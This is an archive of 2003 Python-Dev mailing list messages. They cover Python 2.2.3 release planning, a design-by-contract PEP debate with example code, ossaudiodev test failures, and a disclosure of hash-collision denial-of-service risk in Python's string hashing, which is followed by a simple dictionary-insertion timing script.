Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEAGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCKEAGEIAB.tim.one@comcast.net>
Message-ID: <1054153320.12509.3.camel@barry>

On Wed, 2003-05-28 at 16:08, Tim Peters wrote:
> [Tim]
> > Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary
> 
> Nope, WeakKeyDictionary.
> 
> > which I fixed in 2.3 but am waiting to hear from Fred about before
> > backporting, the other a segfault I think I traced to subtype_dealloc
> > then assigned to Guido. The segfault should be a showstopper:
> >
> >     http://www.python.org/sf/742911
> 
> No change there.

Guido promised to look into the latter.  We'll withhold lunch from Fred
until he looks at the former.

kung-pao-ish-ly y'rs,
-Barry





From pjones@redhat.com  Wed May 28 21:55:56 2003
From: pjones@redhat.com (Peter Jones)
Date: Wed, 28 May 2003 16:55:56 -0400 (EDT)
Subject: [Python-Dev] Introduction
In-Reply-To: <C88C443E-9143-11D7-BD8E-00039344A0EC@wayforward.net>
Message-ID: <Pine.LNX.4.44.0305281548150.19024-100000@devserv.devel.redhat.com>

Hi, I'm Peter.  Long time listener, first time caller.

On Wed, 28 May 2003, Terence Way wrote:

> > A number of things aren't clear from your PEP.  For example, how would
> > syntax errors in assertions be handled?  How is backward compatibility
> > with existing docstrings that may use 'inv:' or 'pre:' to specify
> > conditions informally?
>
> Um.  No thought given to that.  My first guess is: syntax errors printed
> to standard error, optionally silently ignored, no safety checks
> installed either way.

It seems like either of these methods of coping with legacy docstrings
thwarts your basic premises.  Unless the well-formed nature of the
contracts is enforced, it seems to be fairly difficult to e.g. randomly
test a function.  

What if the docstring fails to parse?  I have to be listening to stderr to
know that it didn't work.  I then have to parse the message from stderr to
figure out which function didn't work, and finally I have to somehow mark 
this function as not compliant, and ignore whatever results I get.

It really seems like you want them either "on" or "off", not "on, but it 
might fail in some silent or hard to trap way".

> > Are you proposing that this be part of Python's core syntax?  If so, 
> > then why do it as docstrings?  Are you proposing instead that your 
> > implementation be part of the standard library?  If so, then where is 
> > the documentation for how a developer enables the behavior?
>
> Proposing that some implementation, hopefully mine, be put in the
> standard library.  I *really* don't think contracts should be part of
> the core syntax: contracts belong in the documentation, and changing all
> the doc tools to parse code looking for contract assertions is harder
> than building one or two docstring implementations.

The assertion that contracts don't belong in the core seems entirely
separate from the discussion of their place in docstrings or in real code.

That being said, you still haven't explained *why* contracts belong in
docstrings (or in documentation in general).  They are executable code;  
why not treat them as such?

> self.note(): where *is* the documentation on how to enable the
> behavior.

I suspect we have to know this before we can know which way is easier.  

That being said, I really don't see how these contracts can be meaningful
as part of a docstring without some better mechanism for handling old
docstrings that have been ruled malformed.  What's your reasoning against
making them their own kind of block, like "try:"?

-- 
        Peter





From patmiller@llnl.gov  Wed May 28 22:01:24 2003
From: patmiller@llnl.gov (Pat Miller)
Date: Wed, 28 May 2003 14:01:24 -0700
Subject: [Python-Dev] Introduction
References: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>
Message-ID: <3ED523A4.7030405@llnl.gov>

> http://www.wayforward.net/pycontract/pep-0999.html

I think another issue with using doc strings in this way
is that you are overloading a feature visible to end users.

If I look at the doc string then I would expect to be confused by the result:

 >>> help(circbuf)
Help on class circbuf in module __main__:

class circbuf
  |  Methods defined here:
  |
  |  get(self)
  |      Pull an entry from a non-empty circular buffer.
  |
  |      pre: not self.is_empty()
  |      post[self.g, self.len]:
  |          __return__ == self.buf[__old__.self.g]
  |          self.len == __old__.self.len - 1
  | ...

Way too cryptic even for me :-)

I think you could get the same effect by overloading property
so you could make methods "smart" about pre- and post-conditions.
The following is a first quick hack at it...:

class eiffel(property):
     """eiffel(method,precondition,postcondition)

     Implement an Eiffel-style method that enforces pre-
     and post-conditions.  I guess you could turn this
     on and off if you wanted...

     class foo:
       def pre(self): assert self.x > 0
       def post(self):  assert self.x > 0
       def increment(self):
           self.x += 1
           return

       increment = eiffel(increment, pre, post)
     """

     def __init__(self,method,precondition,postcondition,doc=None):
         self.method = method
         self.precondition = precondition
         self.postcondition = postcondition
         super(eiffel,self).__init__(self.__get,None,None,doc)
         return


     def __get(self,this):
         class funny_method:
             def __init__(self,this,method,precondition,postcondition):
                 self.this	= this
                 self.method	= method
                 self.precondition	= precondition
                 self.postcondition	= postcondition
                 return
             def __call__(self,*args,**kw):
                 self.precondition(self.this)
                 value = self.method(self.this,*args,**kw)
                 self.postcondition(self.this)
                 return value

         return funny_method(this,self.method,self.precondition,self.postcondition)



class circbuf:
     def __init__(self):
         self.stack = []
         return

     def _get_pre(self):
         assert not self.is_empty()
         return
     def _get_post(self):
         # nothing useful to assert here without the return value; checking
         # non-emptiness would (wrongly) fire when the last entry is pulled
         return
     def _get(self):
         """Pull an entry from a non-empty circular buffer."""
         val = self.stack[-1]
         del self.stack[-1]
         return val

     get = eiffel(_get,_get_pre,_get_post)

     def put(self,val):
         self.stack.append(val)
         return

     def is_empty(self):
         return len(self.stack) == 0


B = circbuf()
B.put('hello')
print B.get()

# Will bomb...
print B.get()


-- 
Patrick Miller | (925) 423-0309 | http://www.llnl.gov/CASC/people/pmiller

If you think you can do a thing or think you can't do a thing, you're
right.  -- Henry Ford



From pje@telecommunity.com  Wed May 28 23:05:30 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Wed, 28 May 2003 18:05:30 -0400
Subject: [Python-Dev] Contracts PEP (was re: Introduction)
In-Reply-To: <C88C443E-9143-11D7-BD8E-00039344A0EC@wayforward.net>
References: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>
Message-ID: <5.1.1.6.0.20030528174512.01eb5e50@telecommunity.com>

At 03:37 PM 5/28/03 -0400, Terence Way wrote:
>On Wednesday, May 28, 2003, at 02:23  PM, Phillip J. Eby wrote:
>>Also, I didn't find the motivation section convincing.  Your answer to 
>>"Why not have several different implementations, or let programmers 
>>implement their own assertions?" isn't actually a justification.  If 
>>Alice uses some package to wrap her methods with checks, I can weaken the 
>>preconditions in a subclass, by simply overriding the methods.  If I 
>>can't do that, then it is a weakness of the DBC package Alice used, or of 
>>Alice's package, not a weakness of Python.
>Consider when Alice's preconditions work, but Bob's do not.  Code that
>thinks it's calling Alice's code *must not* break when calling Bob's.

Okay, you've completely lost me now, because I don't know what you mean by 
"work" in this context.  Do you mean, "are met by the caller"?  Or "are 
syntactically valid"?  Or...?


>Weakening pre-conditions means that Alice's pre-conditions must be
>tested as well: and Bob's code is run even if his pre-conditions fail.

Whaa?  That can't be right.  Weakening a precondition means that Bob's 
preconditions should *replace* Alice's preconditions, if Bob has supplied 
newer, weaker preconditions.  Bob's code should *not* be run if Bob's 
preconditions are not met.

Just to make sure we're not on completely different pages here, I'm 
thinking this:

class AlicesClass:
     def something(self):
         """pre: foo and bar"""

class BobsClass(AlicesClass):
     def something(self):
         """pre: foo"""

That, to me, is weakening a precondition.  Now, if what you're saying is 
that Bob's code must work if *Alice's* preconditions are met, then that's 
something different.  What you're saying then, is that it's required that a 
precondition in a subclass be logically implied by each of the 
corresponding preconditions in the base classes.

That is certainly a reasonable requirement, but I don't see why the 
language needs to enforce it, certainly not by running Bob's code even when 
Bob's precondition fails!  If you're going to enforce it, it should be 
enforced by issuing an error for preconditions that aren't logically 
implied by their superclass preconditions.  Then you actually get some 
benefit from the static checking.  If you just run Bob's code, he has no 
way to notice that he's violating Alice's contract, until his code keeps 
breaking at runtime.  (And then, he will almost certainly come to the 
conclusion that the contract checker is broken!)

OTOH, if you accept Bob's precondition as he stated it, then he gets the 
behavior he asked for.  If this is a violation of Alice's contract, Bob's 
users will either read the fact in his docs, or complain.


>The converse is also true: code that understands Bob's pre-conditions
>must not fail even if Alice's pre-conditions fail.  This is tough to
>do with asserts, or with incompatible contract packages.

I still don't understand.  If Bob has replaced Alice's method, what do her 
preconditions have to do with it any more?  If Bob's code *calls* Alice's 
method, then the conditions of Alice's method presumably *do* need to apply 
for that upcall, or else she has written them without enough indirection.


>I haven't made that clear in the PEP or the samples, and it needs to
>be clear, because it is the /only/ reason why contracts need to be in
>the language/standard runtime.

Yep, and I'm still totally not seeing why Alice and Bob have to use the 
same mechanism.  Alice could use method wrappers, Bob could use a 
metaclass, and Carol could use assert statements, as far as I can see, 
unless you are looking for static correctness checking.  (In which case, 
docstrings are the wrong place for this.)



From barry@python.org  Wed May 28 23:09:50 2003
From: barry@python.org (Barry Warsaw)
Date: 28 May 2003 18:09:50 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>
References: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>
Message-ID: <1054159790.4482.0.camel@geddy>

On Wed, 2003-05-28 at 16:03, Tim Peters wrote:
> [Barry]
> > I've not heard about any showstoppers for Python 2.2.3.
> 
> Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary which I
> fixed in 2.3 but am waiting to hear from Fred about before backporting, the
> other a segfault I think I traced to subtype_dealloc then assigned to Guido.
> The segfault should be a showstopper:
> 
>     http://www.python.org/sf/742911

Ok, I just spoke to Fred.  He gives his seal of approval for the weakref
backport.  I'll do that, after testing the patches and backporting the
tests.

Guido's still going to look at the latter bug.

-Barry




From martin@v.loewis.de  Thu May 29 02:03:53 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 29 May 2003 03:03:53 +0200
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it applied?
In-Reply-To: <16084.45321.727469.548923@montanaro.dyndns.org>
References: <16084.3870.666366.928341@montanaro.dyndns.org>
 <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>
 <16084.45321.727469.548923@montanaro.dyndns.org>
Message-ID: <m33ciytvgm.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> I guess I misunderstood how "cvs log" worked.  Given "cvs log foo" I thought
> it would list the checkin comments for all versions and all branches of foo.

And indeed that's what it does. Look to the very end of the log.

Regards,
Martin


From gward@python.net  Thu May 29 02:32:29 2003
From: gward@python.net (Greg Ward)
Date: Wed, 28 May 2003 21:32:29 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030529013229.GA19091@cthulhu.gerg.ca>

[me, on ossaudiodev.setparameters()]
> In addition to being silly, this is not the documented interface.  The
> docs don't mention the 'sample_size' argument at all.  Presumably the
> doc writer realized the silliness and was going to pester me to remove
> 'sample_size', but never got around to it.  (Lot of that going around.)
> 
> So, even though we're in a beta cycle, am I allowed to change the code
> so it's 1) sensible and 2) consistent with the documentation?

[Guido]
> Yes.  I like silliness in a MP skit, but not in my APIs. :-)

OK, done.  I've also beefed up the test script a bit.  So, once again,
if you have a Linux or FreeBSD system with working sound card, can you
run

  ./python Lib/test/regrtest.py -uaudio test_ossaudiodev

...preferably before and after a "cvs up && make" to see if things are
better, worse, or unchanged?

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
All the world's a stage and most of us are desperately unrehearsed.




From guido@python.org  Thu May 29 15:50:06 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 29 May 2003 10:50:06 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: Your message of "Wed, 28 May 2003 21:32:29 EDT."
 <20030529013229.GA19091@cthulhu.gerg.ca>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>
 <20030529013229.GA19091@cthulhu.gerg.ca>
Message-ID: <200305291450.h4TEo6q15846@odiug.zope.com>

> [me, on ossaudiodev.setparameters()]
> > In addition to being silly, this is not the documented interface.  The
> > docs don't mention the 'sample_size' argument at all.  Presumably the
> > doc writer realized the silliness and was going to pester me to remove
> > 'sample_size', but never got around to it.  (Lot of that going around.)
> > 
> > So, even though we're in a beta cycle, am I allowed to change the code
> > so it's 1) sensible and 2) consistent with the documentation?
> 
> [Guido]
> > Yes.  I like silliness in a MP skit, but not in my APIs. :-)
> 
> OK, done.  I've also beefed up the test script a bit.  So, once again,
> if you have a Linux or FreeBSD system with working sound card, can you
> run
> 
>   ./python Lib/test/regrtest.py -uaudio test_ossaudiodev
> 
> ...preferably before and after a "cvs up && make" to see if things are
> better, worse, or unchanged?

Did you check in the changes to ossaudiodev?

A cvs update gave me new test files:

    P Lib/test/test_ossaudiodev.py
    P Lib/test/output/test_ossaudiodev

but no new C code, and now I get this error when I run the above test:

    $ ./python ../Lib/test/regrtest.py -uaudio test_ossaudiodev
    test_ossaudiodev
    test test_ossaudiodev crashed -- exceptions.TypeError: setparameters() takes at least 4 arguments (3 given)
    1 test failed:
	test_ossaudiodev
    $

Before the cvs update, the test produced some audio and then hung;
when I interrupted, here's the traceback:

    Traceback (most recent call last):
      File "../Lib/test/regrtest.py", line 974, in ?
	main()
      File "../Lib/test/regrtest.py", line 264, in main
	ok = runtest(test, generate, verbose, quiet, testdir)
      File "../Lib/test/regrtest.py", line 394, in runtest
	the_package = __import__(abstest, globals(), locals(), [])
      File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 96, in ?
	test()
      File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 93, in test
	play_sound_file(data, rate, ssize, nchannels)
      File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 56, in play_sound_file
	a.write(data)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From terry@wayforward.net  Thu May 29 15:53:16 2003
From: terry@wayforward.net (Terence Way)
Date: Thu, 29 May 2003 10:53:16 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.44.0305281548150.19024-100000@devserv.devel.redhat.com>
Message-ID: <47C92342-91E5-11D7-BD8E-00039344A0EC@wayforward.net>

On Wednesday, May 28, 2003, at 04:55  PM, Peter Jones wrote:

> What if the docstring fails to parse?  I have to be listening to 
> stderr to
> know that it didn't work.  I then have to parse the message from 
> stderr to
> figure out which function didn't work, and finally I have to somehow 
> mark
> this function as not compliant, and ignore whatever results I get.
>
I probably would have figured that out too, eventually... :-)  More on
this further down, when I talk about how to enable docstring testing.

> That being said, you still haven't explained *why* contracts belong in
> docstrings (or in documentation in general).  They are executable code;
> why not treat them as such?
>
Okay, on to the whole docstring-vs-syntax thing; I'm going to quote
liberally from Bertrand Meyer's Object Oriented Software Construction,
1st edition, 7.9 Using Assertions.

There are four main reasons for adding contracts to code:
"""
* Help in writing correct software.
* Documentation aid.
* Debugging tool.
* Support for software fault tolerance.

[...]

The second use is essential in the production of reusable software
elements and, more generally, in organizing the interfaces of
modules in large software systems.  Preconditions, postconditions,
and class invariants provide potential clients of a module with
crucial information about the services offered by the module, expressed
in a concise and precise form.  No amount of verbose documentation can
replace a set of carefully expressed assertions.
"""

I really like Extreme Programming's cut-to-the-bone approach: there
are only two things worth knowing about the code: *what* it does and
*how* it does it.  In XP, what the code does can be inferred from
test cases; how it does it from the source code.  And if you can't
read the code, you have no business talking about how the software
does what it does anyway.

With contracts, I want to move the knowledge of *what* the code does
from the test cases back into the programming documentation.  It
is merely a bonus feature that this documentation can be executed.

When I was learning Python (um, not too long ago) the epiphany of
what this language was all about hit me when I saw the 'doctest'
module.  We're *always* using examples as clear, concise ways to
describe what our code does, but we're all guilty of letting those
examples get out-of-date.  Doctest can crawl into our software
deep enough to keep us honest about our documentation.  Contracts
extend this so it's not just about the basic sample cases, but
about the entire state space that a function supports... "Here be
dragons" but over there be heap-based priority queues.

>> self.note(): where *is* the documentation on how to enable the
>> behavior.
>
> I suspect we have to know this before we can know which way is easier.
>
Now that I've come out as a doctest fanboy, it should be no surprise
that contracts are enabled like this:
     import contracts, mymodule
     contracts.checkmod(mymodule)

The checkmod side effect is that all functions within mymodule are
replaced by auto-generated checking functions.
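
Roughly, a checking wrapper along these lines captures the idea (a
simplified sketch, not the actual implementation; the helper names are
made up, and the 'pre:' expressions are assumed to have been parsed out
of the docstrings already):

import inspect

def make_checker(func, preconditions):
    # preconditions: a list of 'pre:' expression strings from the docstring.
    arg_names = inspect.getargspec(func)[0]
    def checker(*args, **kwargs):
        # Bind the call's arguments to names so the expressions can see them.
        env = dict(zip(arg_names, args))
        env.update(kwargs)
        for expr in preconditions:
            if not eval(expr, func.func_globals, env):
                raise AssertionError("precondition failed: " + expr)
        return func(*args, **kwargs)
    return checker

def checkmod_sketch(module, parsed):
    # 'parsed' maps function names to lists of 'pre:' expression strings,
    # i.e. whatever a docstring parser would have produced.
    for name, exprs in parsed.items():
        setattr(module, name, make_checker(getattr(module, name), exprs))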

And now I think I'm clear in my own mind about backwards-
compatibility with informal 'pre:' docstrings... a programmer
doesn't run checkmod unless she's sure that all docstring
contracts are valid.  Syntax error exceptions will be passed
through to the checkmod caller.

Cheers!



From terry@wayforward.net  Thu May 29 19:26:36 2003
From: terry@wayforward.net (Terence Way)
Date: Thu, 29 May 2003 14:26:36 -0400
Subject: [Python-Dev] Contracts PEP (was re: Introduction)
In-Reply-To: <5.1.1.6.0.20030528174512.01eb5e50@telecommunity.com>
Message-ID: <151E799C-9203-11D7-BD8E-00039344A0EC@wayforward.net>

On Wednesday, May 28, 2003, at 06:05  PM, Phillip J. Eby wrote:

> ... I'm still totally not seeing why Alice and Bob have to use the 
> same mechanism.  Alice could use method wrappers, Bob could use a 
> metaclass, and Carol could use assert statements, as far as I can see, 
> unless you are looking for static correctness checking.  (In which 
> case, docstrings are the wrong place for this.)

Here is the full behavior (all quotes are straight from Bertrand
Meyer's Object Oriented Software Construction, 11.1 Inheritance and
Assertions):

"""
Parents' invariant rule: The invariants of all the parents of a class
apply to the class itself.

The parents' invariants are considered to be added to the class's own
invariant, "addition" being here a logical *and*.
"""

Having a single contract implementation means that Bob's overriding
class can check Alice's invariants, even if none of Alice's methods
are actually called.

"""
Assertion redefinition rule: Let r be a routine in class A and s a
redefinition of r in a descendant of A, or an effective definition of
r if r was deferred.  Then pre(s) must be weaker than or equal to
pre(r), and post(s) must be stronger than or equal to post(r)
"""

Having a single contract implementation means that Bob's overriding
methods' postconditions check Alice's postconditions, even if none of
Alice's methods are actually called.

I hope I've at least convinced you that it would be nice to have a
single implementation to support 'inv:' and 'post:' with inheritance.
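
To make the "logical *and*" concrete, a single checker could walk the
class hierarchy after a method returns, along these lines (a sketch
only; 'declared_inv' and 'declared_post' are invented stand-ins for
whatever tables the real implementation would build from the parsed
docstrings, and new-style classes are assumed so __mro__ is available):

def check_after_call(obj, method_name, env, declared_inv, declared_post):
    # AND together the invariants of every class in the hierarchy, plus the
    # postconditions declared for this method in every class that defines it.
    for klass in obj.__class__.__mro__:
        for expr in declared_inv.get(klass, []):
            assert eval(expr, {}, env), "invariant failed: " + expr
        for expr in declared_post.get((klass, method_name), []):
            assert eval(expr, {}, env), "postcondition failed: " + expr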

Now on to those irritating pre-conditions.

> That, to me, is weakening a precondition.  Now, if what you're saying 
> is that Bob's code must work if *Alice's* preconditions are met, then 
> that's something different.  What you're saying then, is that it's 
> required that a precondition in a subclass be logically implied by 
> each of the corresponding preconditions in the base classes.
>
> That is certainly a reasonable requirement, but I don't see why the 
> language needs to enforce it, certainly not by running Bob's code even 
> when Bob's precondition fails!  If you're going to enforce it, it 
> should be enforced by issuing an error for preconditions that aren't 
> logically implied by their superclass preconditions.  Then you 
> actually get some benefit from the static checking.  If you just run 
> Bob's code, he has no way to notice that he's violating Alice's 
> contract, until his code keeps breaking at runtime.  (And then, he 
> will almost certainly come to the conclusion that the contract checker 
> is broken!)

This is especially irritating because what you're asking for is
exactly what my implementation was doing three weeks ago.  I *agree*
with you.  There seem to be two opposing groups:
Academics: Pre-conditions are ORed!  Liskov Substitution Principle!
Programmers: this is a debugging tool!  Tell me when I mess up!

I admit, I'm doing something different by supporting OR pre-
conditions.  Meyer again:
"""
So the require and ensure clause must always be given for a routine,
even if it is a redefinition, and even if these clauses are identical
to their antecedents in the original.
"""

Well, this is error-prone and wrong for postconditions.  It's not an
issue to just AND a method's post()s with all overridden post()s;
we've covered that earlier.  It's only those pesky preconditions.

Summary:
I agree with your point... pre-conditions should only be checked on a
method call for the pre-conditions of the method itself.  Overridden
methods' preconditions are ignored.

However, this still means some communication between the super-class and
the overriding subclass is necessary.  Contract invariants and
postconditions of overridden classes/methods still need to be checked.

Cheers!



From fdrake@acm.org  Thu May 29 19:46:12 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 29 May 2003 14:46:12 -0400
Subject: [Python-Dev] Python 2.2.3 docs freeze
Message-ID: <16086.21876.190793.365508@grendel.zope.com>

I'm going to generate the Python 2.2.3 documentation packages now, so
please no more checkins in the Doc/ tree on the release22-maint
branch.

Thanks!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From jack@performancedrivers.com  Thu May 29 20:14:21 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Thu, 29 May 2003 15:14:21 -0400
Subject: [Python-Dev] Release question
Message-ID: <20030529151421.G1276@localhost.localdomain>

The PEPs are pretty thorough about how to announce and build
releases.  My question is about cvs, branching, and feature freezes.
I joined python-dev after the 2.2 release so I haven't been around
for a 'round number' release yet.

I'm guessing 2.3 is in bugfix only mode.  When is 2.4 tagged, and what
is the timeframe on that? (the linux kernel generally waits a while
before starting the next dev branch).  Assume I asked intelligent questions
about related things and please answer them too *wink*.

Thanks,

-jack


From scrosby@cs.rice.edu  Thu May 29 21:33:12 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 15:33:12 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
Message-ID: <oydptm1biif.fsf@bert.cs.rice.edu>

Hello. We have analyzed this software to determine its vulnerability
to a new class of DoS attacks related to a recent paper, ''Denial
of Service via Algorithmic Complexity Attacks.''

This paper discusses a new class of denial of service attacks that
work by exploiting the difference between average case performance and
worst-case performance. In an adversarial environment, the data
structures used by an application may be forced to experience their
worst case performance. For instance, hash tables are usually thought
of as being constant time operations, but with large numbers of
collisions they will degrade to a linked list and may lead to a 100-10,000
times performance degradation. Because of the widespread use of hash
tables, the potential for attack is extremely broad. Fortunately,
in many cases, other limits on the system limit the impact of these
attacks.

To be attackable, an application must have a deterministic or
predictable hash function and accept untrusted input. In general, for
the attack to be significant, the application must be willing and
able to accept hundreds to tens of thousands of 'attack
inputs'. Because of that requirement, it is difficult to judge the
impact of these attacks without knowing the source code extremely well,
and knowing all ways in which a program is used.

As part of this project, I have examined python 2.3b1, and the hash
function 'string_hash' is deterministic. Thus any script that may hash
untrusted input may be vulnerable to our attack. Furthermore, the
structure of the hash functions allows our fast collision generation
algorithm to work. This means that any script written in python that
hashes a large number of keys from an untrusted source is potentially
subject to a severe performance degradation.

Depending on the application or script, this could be a critical DoS.


The solution for these attacks on hash tables is to make the hash
function unpredictable via a technique known as universal
hashing. Universal hashing is a keyed hash function where, based on
the key, one of a large set of hash functions is chosen. When
benchmarking, we observe that for short or medium length inputs, it is
comparable in performance to simple predictable hash functions such as
the ones in Python or Perl. Our paper has graphs and charts of our
benchmarked performance.
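
The flavor of the keyed-hash idea can be sketched in a few lines of
Python (an illustration only -- this is not the UHASH construction from
the paper, and it carries no proof of universality):

import random

# The multiplier and initial value are drawn at random once per process, so
# an attacker who cannot see the key cannot precompute colliding inputs.
_HASH_KEY = (random.randrange(1, 2**31) | 1, random.randrange(0, 2**31))

def keyed_hash(s, key=_HASH_KEY):
    mult, x = key
    for c in s:
        x = ((x * mult) + ord(c)) & 0xffffffffL
    return x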

I highly advise using a universal hashing library, either our own or
someone else's. As history has shown, it is very easy to make silly
mistakes when attempting to implement your own 'secure' algorithm.

The abstract, paper, and a library implementing universal hashing is
available at   http://www.cs.rice.edu/~scrosby/hash/.

Scott


From python@rcn.com  Thu May 29 21:55:35 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 29 May 2003 16:55:35 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
References: <oydptm1biif.fsf@bert.cs.rice.edu>
Message-ID: <006f01c32624$a8c0ed80$125ffea9@oemcomputer>

>For instance, hash tables are usually thought
> of as being constant time operations, but with large numbers of
> collisions they will degrade to a linked list and may lead to a 100-10,000
> times performance degradation. 

True enough.  And it's not hard to create tons of keys that will collide
(Uncle Tim even gives an example in the source for those who care
to read).  Going from O(1) to O(n) for each insertion would be a bit 
painful during the process of building up a large dictionary.

So, did your research show a prevalence of or even existence of 
online applications that allow someone to submit high volumes of
meaningless keys to be saved in a hash table?


Raymond Hettinger


From jeremy@zope.com  Thu May 29 22:01:19 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 29 May 2003 17:01:19 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydptm1biif.fsf@bert.cs.rice.edu>
References: <oydptm1biif.fsf@bert.cs.rice.edu>
Message-ID: <1054242079.6832.26.camel@slothrop.zope.com>

Scott,

I just took a minute to look at this.  I downloaded the python-attack
file from your Web site.  I loaded all the strings and then inserted
them into a dictionary.  I also generated a list of 10,000 random
strings and inserted them into a dictionary.

The script is below.

The results show that inserting the python-attack strings is about 4
times slower than inserting random strings.

slothrop:~/src/python/dist/src/build> ./python ~/attack.py
~/python-attack 
time 0.0898009538651
size 10000
slothrop:~/src/python/dist/src/build> ./python ~/attack.py
~/simple        
time 0.0229719877243
size 10000

Jeremy

import time

def main(path):
    # One candidate key per line of the input file.
    L = [l.strip() for l in open(path)]

    d = {}
    t0 = time.time()
    for k in L:
        d[k] = 1
    t1 = time.time()
    # Report how long the insertions took and how many distinct keys survived.
    print "time", t1 - t0
    print "size", len(d)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])




From scrosby@cs.rice.edu  Thu May 29 22:10:04 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 16:10:04 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <1054242079.6832.26.camel@slothrop.zope.com>
References: <oydptm1biif.fsf@bert.cs.rice.edu>
 <1054242079.6832.26.camel@slothrop.zope.com>
Message-ID: <oyd1xyhbgsz.fsf@bert.cs.rice.edu>

On 29 May 2003 17:01:19 -0400, Jeremy Hylton <jeremy@zope.com> writes:

> Scott,
> 
> I just took a minute to look at this.  I downloaded the python-attack
> file from your Web site.  I loaded all the strings and then inserted
> them into a dictionary.  I also generated a list of 10,000 random
> strings and inserted them into a dictionary.

Ok. It should have taken almost a minute instead of .08 seconds in the
attack version.  My file is broken. I'll be constructing a new one
later this evening.  If you test perl with the perl files, you'll see
what should have occurred in this case.

> The script is below.

Thank you.

Scott


From scrosby@cs.rice.edu  Thu May 29 22:23:24 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 16:23:24 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <006f01c32624$a8c0ed80$125ffea9@oemcomputer>
References: <oydptm1biif.fsf@bert.cs.rice.edu>
 <006f01c32624$a8c0ed80$125ffea9@oemcomputer>
Message-ID: <oydsmqxa1mb.fsf@bert.cs.rice.edu>

On Thu, 29 May 2003 16:55:35 -0400, "Raymond Hettinger" <python@rcn.com> writes:
> So, did your research show a prevalence of or even existence of 
> online applications that allow someone to submit high volumes of
> meaningless keys to be saved in a hash table?

I am not a python guru and we weren't looking for specific
applications, so I wouldn't know.

Scott


From gward@python.net  Thu May 29 22:56:52 2003
From: gward@python.net (Greg Ward)
Date: Thu, 29 May 2003 17:56:52 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: <200305291450.h4TEo6q15846@odiug.zope.com>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net> <20030529013229.GA19091@cthulhu.gerg.ca> <200305291450.h4TEo6q15846@odiug.zope.com>
Message-ID: <20030529215652.GB28065@cthulhu.gerg.ca>

On 29 May 2003, Guido van Rossum said:
> Did you check in the changes to ossaudiodev?

Oops!  I did now -- thanks.  Please try again.

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
I just read that 50% of the population has below median IQ!


From guido@python.org  Thu May 29 23:29:39 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 29 May 2003 18:29:39 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: Your message of "Thu, 29 May 2003 17:56:52 EDT."
 <20030529215652.GB28065@cthulhu.gerg.ca>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net> <20030529013229.GA19091@cthulhu.gerg.ca> <200305291450.h4TEo6q15846@odiug.zope.com>
 <20030529215652.GB28065@cthulhu.gerg.ca>
Message-ID: <200305292229.h4TMTdU19567@odiug.zope.com>

> > Did you check in the changes to ossaudiodev?
> 
> Oops!  I did now -- thanks.  Please try again.

Alas, no change.  Still some squeaks from the speaker followed by a
hanging process:

Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 974, in ?
    main()
  File "../Lib/test/regrtest.py", line 264, in main
    ok = runtest(test, generate, verbose, quiet, testdir)
  File "../Lib/test/regrtest.py", line 394, in runtest
    the_package = __import__(abstest, globals(), locals(), [])
  File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 119, in ?
    test()
  File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 116, in test
    play_sound_file(data, rate, ssize, nchannels)
